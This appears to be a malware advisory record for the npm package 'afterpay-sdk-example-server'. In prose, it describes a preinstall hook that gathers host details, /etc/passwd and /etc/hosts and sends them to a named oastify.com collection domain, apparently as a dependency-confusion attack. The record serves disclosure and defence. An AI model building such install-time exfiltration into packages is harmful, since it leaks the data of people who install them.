MAL-2023-1111

--- _-= Per source details. Do not edit below this line.=-_

## Source: amazon-inspector (a81a53b70f9ae2610148f223507c5427bea5a52160b7f8ba214a0c3ac0fe96f7) package.json declares a preinstall hook ("preinstall": "node index.js") that runs automatically on npm install. index.js requires os/fs/https, then collects host identifiers and installer-side files — __dirname, os.homedir(), os.hostname(), os.userInfo(), DNS servers, the full contents of /etc/passwd and /etc/hosts, and the package.json — and POSTs them over HTTPS to xqrangwae3pk5bd12xbr6t8q9hfc32rr.oastify.com (a Burp Collaborator OAST subdomain). The package name 'afterpay-sdk-example-server' impersonates an internal Afterpay SDK example, consistent with a dependency-confusion payload targeting Afterpay's internal build systems. Whether published as research or attack, any installer running npm install leaks system account data and host fingerprints to an attacker-controlled out-of-band collection endpoint.

## Source: ossf-package-analysis (555a159aa3b74ea73f8574c05e14aa536948cbe56b0420bcdcc0daa2a911ae2c) The OpenSSF Package Analysis project identified 'afterpay-sdk-example-server' @ 20.0.0 (npm) as malicious.

It is considered malicious because: - The package communicates with a domain associated with malicious activity.